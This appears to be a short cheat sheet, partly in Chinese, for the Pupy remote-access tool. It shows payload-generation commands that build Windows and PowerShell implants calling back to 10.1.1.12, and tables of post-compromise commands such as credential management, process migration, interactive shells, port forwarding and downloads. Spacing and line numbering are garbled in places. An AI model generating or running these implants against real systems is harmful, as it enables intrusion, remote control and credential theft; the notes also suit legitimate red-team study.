client : executable to run on the target (.exe, .dll, .lin, .so).
连接方式 (绑定、反射、DNS等)
1
bind, auto_proxy ,dnscnc, connect
生成
1 2 3
gen client -O windows -A x64 connect -c 10.1.1.12:443 -t http
gen ps1 -O windows -A x86 bind --host 10.1.1.12 --port 8080
Base Command
Command
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
{ COMMANDS } COMMAND DESCRIPTION ----------------------------------------------------------------------- dnscnc DNSCNC control jobs Manage Jobs help Show help exposed list exposed objects/methods python Start the local python interpreter (for debugging purposes) sessions list/interact with established sessions restartRestart pupysh tag Assign tag tocurrentsession exitExit Shell connectConnectto the bind payload run Run a module on one or multiple clients logging Show/setloglevel config Workwithconfiguration file gen Generate payload creds Credentials manager listenstart/stop/showcurrent listeners
{ ALIASED MODULES } MODULE DESCRIPTION ------------------------------------------------------------ getpidlist process information exitexit the client on the other side getppid list parent process information cdchange directory alive request to send keepalive packets on rpyc level rm removeafileora directory netstat list terminal sessions lastlist terminal sessions wlist terminal sessions date Get current date cpcopyfileor directory pslist processes mkdir create anempty directory forward Local/remote port forwarding and SOCKS proxy lslistsystemfiles cat show contents of afile mv movefileor directory ip list interfaces http Trivial Get/Post requests via HTTP protocol getuid get username pwd Get current working dir
Aliases
1 2 3 4 5 6 7 8 9 10 11 12
{ ALIASES } ALIAS COMMAND ---------------------------- info get_info pyexec pyexec exec shell_exec ps ps migrate migrate shell interactive_shell kill process_kill mount drives du download -S